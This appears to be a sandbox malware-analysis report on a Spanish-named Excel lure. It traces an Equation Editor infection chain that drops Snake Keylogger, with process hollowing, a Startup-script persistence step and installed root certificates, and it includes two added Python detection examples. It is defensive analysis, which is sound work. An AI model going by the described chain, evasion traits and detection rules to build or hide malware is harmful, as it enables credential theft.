Source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: RegSvcs.exe PID: 1304, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 1304, type: MEMORYSTR Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: RegSvcs.exe PID: 2160, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 2160, type: MEMORYSTR Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, WP6RZJql8gZrNhVA9v.cs Cryptographic APIs: 'CreateDecryptor'
Source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs Cryptographic APIs: 'CreateDecryptor'
Source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, ----.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, ---.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs Cryptographic APIs: 'CreateDecryptor'
Source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs Cryptographic APIs: 'CreateDecryptor'
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winXLSX@13/16@20/4
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_010637B5 GetLastError,FormatMessageW, 8_2_010637B5
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_010510BF AdjustTokenPrivileges,CloseHandle, 8_2_010510BF
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_010516C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 8_2_010516C3
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_013910BF AdjustTokenPrivileges,CloseHandle, 11_2_013910BF
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_013916C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 11_2_013916C3
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_010651CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, 8_2_010651CD
Source: C:\Users\user\AppData\Roaming\negrett.exe Code function: 5_2_00B9A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 5_2_00B9A67C
Source: C:\Users\user\AppData\Roaming\negrett.exe Code function: 5_2_00B8648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize, 5_2_00B8648E
Source: C:\Users\user\AppData\Roaming\negrett.exe Code function: 5_2_00B142A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, 5_2_00B142A2
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$Orden de compra 0001-00255454.xlam.xlsx Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Mutant created: NULL
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR71F4.tmp Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Orden de compra 0001-00255454.xlam.xlsx Virustotal: Detection: 55%
Source: Orden de compra 0001-00255454.xlam.xlsx ReversingLabs: Detection: 68%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\negrett.exe C:\Users\user\AppData\Roaming\negrett.exe
Source: C:\Users\user\AppData\Roaming\negrett.exe Process created: C:\Users\user\AppData\Local\directory\name.exe C:\Users\user\AppData\Roaming\negrett.exe
Source: C:\Users\user\AppData\Local\directory\name.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\user\AppData\Roaming\negrett.exe
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"
Source: C:\Users\user\AppData\Local\directory\name.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\directory\name.exe"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\negrett.exe C:\Users\user\AppData\Roaming\negrett.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\negrett.exe Process created: C:\Users\user\AppData\Local\directory\name.exe C:\Users\user\AppData\Roaming\negrett.exe Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\user\AppData\Roaming\negrett.exe Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\directory\name.exe" Jump to behavior
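The process-creation lines above record the whole chain: EXCEL.EXE spawns EQNEDT32.EXE, the Equation Editor drops and runs negrett.exe from AppData\Roaming, negrett.exe starts name.exe, name.exe starts the .NET utility RegSvcs.exe, and on the next logon wscript.exe re-runs name.exe from the Startup folder. Note also that name.exe and RegSvcs.exe are created with the command line of the stage that spawned them (negrett.exe, then name.exe); an image path that does not match the command line is what a process started suspended and replaced (hollowing), or a spoofed command line, looks like in telemetry. The following is an added example, not part of the Joe Sandbox report, that applies those checks to process-creation records. The records are constructed here from the report's own lines in a Sysmon Event ID 1 style; the field names (ParentImage, Image, CommandLine) and the finding labels are assumptions of the example.

```python
"""Added example (not from the report): detection logic for the process chain
observed above, run over constructed Sysmon-style process-creation records."""

import re

# Office hosts plus the Equation Editor, which is launched on their behalf.
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "eqnedt32.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Paths a standard user can write to without elevation.
USER_WRITABLE = re.compile(r"^c:\\users\\[^\\]+\\appdata\\", re.I)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def first_token(cmdline: str) -> str:
    """Executable portion of a command line, whether or not it is quoted."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        end = cmdline.find('"', 1)
        return cmdline[1:end] if end > 0 else cmdline[1:]
    return cmdline.split(" ", 1)[0]


def analyze(event: dict) -> list:
    """Return the list of findings for one process-creation record."""
    findings = []
    parent = basename(event["ParentImage"])
    image = event["Image"]
    img = basename(image)
    # Equation Editor should never start child processes (CVE-2017-11882 pattern).
    if parent == "eqnedt32.exe":
        findings.append("equation-editor-child-process")
    if parent in OFFICE_PARENTS and img == "eqnedt32.exe":
        findings.append("office-spawned-equation-editor")
    if parent in OFFICE_PARENTS and USER_WRITABLE.match(image):
        findings.append("office-app-spawned-user-dir-binary")
    # wscript/cscript running a dropped binary from a user-writable path.
    if parent in SCRIPT_HOSTS and USER_WRITABLE.match(image):
        findings.append("script-host-spawned-user-dir-binary")
    # A .NET framework utility started by a binary in a user-writable path:
    # a common host for injected payloads.
    if img == "regsvcs.exe" and USER_WRITABLE.match(event["ParentImage"]):
        findings.append("dotnet-utility-spawned-from-user-dir")
    # Image path and command line disagree: hollowing or command-line spoofing.
    if basename(first_token(event["CommandLine"])) != img:
        findings.append("cmdline-image-mismatch")
    return findings


# Constructed from the report's "Process created" lines; not captured telemetry.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "Image": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "CommandLine": r'"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding'},
    {"ParentImage": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "Image": r"C:\Users\user\AppData\Roaming\negrett.exe",
     "CommandLine": r"C:\Users\user\AppData\Roaming\negrett.exe"},
    {"ParentImage": r"C:\Users\user\AppData\Roaming\negrett.exe",
     "Image": r"C:\Users\user\AppData\Local\directory\name.exe",
     "CommandLine": r"C:\Users\user\AppData\Roaming\negrett.exe"},
    {"ParentImage": r"C:\Users\user\AppData\Local\directory\name.exe",
     "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
     "CommandLine": r"C:\Users\user\AppData\Roaming\negrett.exe"},
    {"ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Users\user\AppData\Local\directory\name.exe",
     "CommandLine": r'"C:\Users\user\AppData\Local\directory\name.exe"'},
]


def triage(events: list) -> list:
    """(image basename, findings) for every record, in input order."""
    return [(basename(e["Image"]), analyze(e)) for e in events]


if __name__ == "__main__":
    for name, hits in triage(SAMPLE_EVENTS):
        print(f"{name:14} {', '.join(hits) or '-'}")
```

Every stage after EXCEL.EXE trips at least one check, and the two hollowed stages (name.exe, RegSvcs.exe) are caught by the command-line mismatch alone, so the chain is detectable even where the parent/child rules are too noisy to alert on.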
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: wow64win.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: msi.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dwmapi.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: version.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: secur32.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: winhttp.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: webio.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: winnsi.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: nlaapi.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: credssp.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: ncrypt.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: bcrypt.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\negrett.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\negrett.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\negrett.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\negrett.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\negrett.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\negrett.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\negrett.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\negrett.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\negrett.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\negrett.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\negrett.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: Orden de compra 0001-00255454.xlam.xlsx Initial sample: OLE zip file path = xl/calcChain.xml
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: _.pdb source: RegSvcs.exe, 00000009.00000002.887613272.00000000009E8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: name.exe, 00000008.00000003.776938516.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000008.00000003.777173422.0000000000E10000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000B.00000003.811942051.00000000011D0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000B.00000003.813355111.0000000002B70000.00000004.00001000.00020000.00000000.sdmp
Source: Orden de compra 0001-00255454.xlam.xlsx Initial sample: OLE indicators vbamacros = False

Data Obfuscation

Source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, WP6RZJql8gZrNhVA9v.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: C:\Users\user\AppData\Roaming\negrett.exe Code function: 5_2_00B142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 5_2_00B142DE
Source: C:\Users\user\AppData\Roaming\negrett.exe Code function: 5_3_029EFE76 push ecx; ret 5_3_029EFE89
Source: C:\Users\user\AppData\Roaming\negrett.exe Code function: 5_2_00B30A76 push ecx; ret 5_2_00B30A89
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_01010A76 push ecx; ret 8_2_01010A89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0041C40C push cs; iretd 9_2_0041C4E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0041C50E push cs; iretd 9_2_0041C4E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0040E21D push ecx; ret 9_2_0040E230
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0041C6BE push ebx; ret 9_2_0041C6BF
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_01350A76 push ecx; ret 11_2_01350A89
Source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, WP6RZJql8gZrNhVA9v.cs High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'HvkAfo9TVO8ur', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'HvkAfo9TVO8ur', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'HvkAfo9TVO8ur', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'HvkAfo9TVO8ur', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'HvkAfo9TVO8ur', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'

Persistence and Installation Behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob Jump to behavior
Source: C:\Users\user\AppData\Roaming\negrett.exe File created: C:\Users\user\AppData\Local\directory\name.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\negrett.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\T76434567000[1].exe Jump to dropped file
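The two registry values EQNEDT32.EXE writes under HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates are new entries in the machine's trusted root store; the key name is the certificate's SHA-1 thumbprint and the Blob value holds the certificate together with its cached properties. Those thumbprints are the artifact to hunt for on other hosts, including from an offline SOFTWARE hive or a .reg export. The following is an added example, not part of the report, that parses such a Blob value and checks it against the key name and the two thumbprints above. The element layout (DWORD property id, DWORD reserved, DWORD size, data) is the documented certificate-store blob structure and the property ids are the wincrypt.h CERT_*_PROP_ID values; the certificate bytes and the .reg lines used to exercise the parser are constructed stand-ins, not the certificates the sample installed.

```python
"""Added example (not from the report): parse a SystemCertificates\ROOT
"Blob" registry value and test it against the report's thumbprints."""

import hashlib
import struct

# SHA-1 thumbprints taken from the report's registry lines.
IOC_THUMBPRINTS = {
    "3F728A35DE52B2C8994A4FB101A03B95E87B06C8",
    "12891DF7B048CD69D0196C8AD7A754C8A812A08C",
}

# Property identifiers from wincrypt.h.
CERT_SHA1_HASH_PROP_ID = 3
CERT_CERT_PROP_ID = 32


def parse_cert_blob(blob: bytes) -> dict:
    """Split a store blob into {property id: data}.

    Each element is DWORD propid, DWORD reserved (observed as 1), DWORD size,
    followed by `size` data bytes; all fields little-endian."""
    props, off = {}, 0
    while off + 12 <= len(blob):
        propid, _reserved, size = struct.unpack_from("<III", blob, off)
        off += 12
        if off + size > len(blob):
            raise ValueError("truncated blob element")
        props[propid] = blob[off:off + size]
        off += size
    if off != len(blob):
        raise ValueError("trailing bytes in blob")
    return props


def check_root_entry(key_name: str, blob: bytes) -> dict:
    """Recompute the thumbprint from the embedded certificate and compare it
    with the key name, the cached SHA-1 property and the IOC list."""
    props = parse_cert_blob(blob)
    cert = props.get(CERT_CERT_PROP_ID, b"")
    computed = hashlib.sha1(cert).hexdigest().upper()
    cached = props.get(CERT_SHA1_HASH_PROP_ID, b"").hex().upper()
    return {
        "thumbprint": computed,
        "key_name_is_ioc": key_name.upper() in IOC_THUMBPRINTS,
        "ioc_hit": computed in IOC_THUMBPRINTS,
        "matches_key_name": computed == key_name.upper(),
        "matches_cached_hash": computed == cached,
    }


def blob_from_reg_export(lines) -> bytes:
    """Reassemble a "Blob"=hex:.. value from .reg export lines, where
    continuation lines end in a backslash."""
    parts, collecting = [], False
    for raw in lines:
        line = raw.strip()
        if not collecting:
            if not line.startswith('"Blob"=hex:'):
                continue
            line = line[len('"Blob"=hex:'):]
            collecting = True
        continued = line.endswith("\\")
        parts.append(line.rstrip("\\"))
        if not continued:
            break
    return bytes(int(h, 16) for h in "".join(parts).split(",") if h)


def build_blob(cert_der: bytes) -> bytes:
    """Constructed test data: lay out a minimal blob the way the store does,
    so the parser can be exercised without a live registry."""
    sha1 = hashlib.sha1(cert_der).digest()
    out = b""
    for propid, data in ((CERT_SHA1_HASH_PROP_ID, sha1), (CERT_CERT_PROP_ID, cert_der)):
        out += struct.pack("<III", propid, 1, len(data)) + data
    return out


# Constructed stand-in (not valid DER); a real entry holds an X.509 certificate.
FAKE_CERT = b"\x30\x82\x00\x10" + b"example-root-certificate"

if __name__ == "__main__":
    blob = build_blob(FAKE_CERT)
    print(check_root_entry(hashlib.sha1(FAKE_CERT).hexdigest().upper(), blob))
    print(check_root_entry("3F728A35DE52B2C8994A4FB101A03B95E87B06C8", blob))
```

A key name on the IOC list is the direct hit; a key whose name or cached hash does not match the SHA-1 of the embedded certificate indicates an entry that was written by hand rather than through CertAddCertificateContextToStore, and deserves a look even when the thumbprint is unknown.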

Boot Survival

Source: C:\Users\user\AppData\Local\directory\name.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs Jump to dropped file
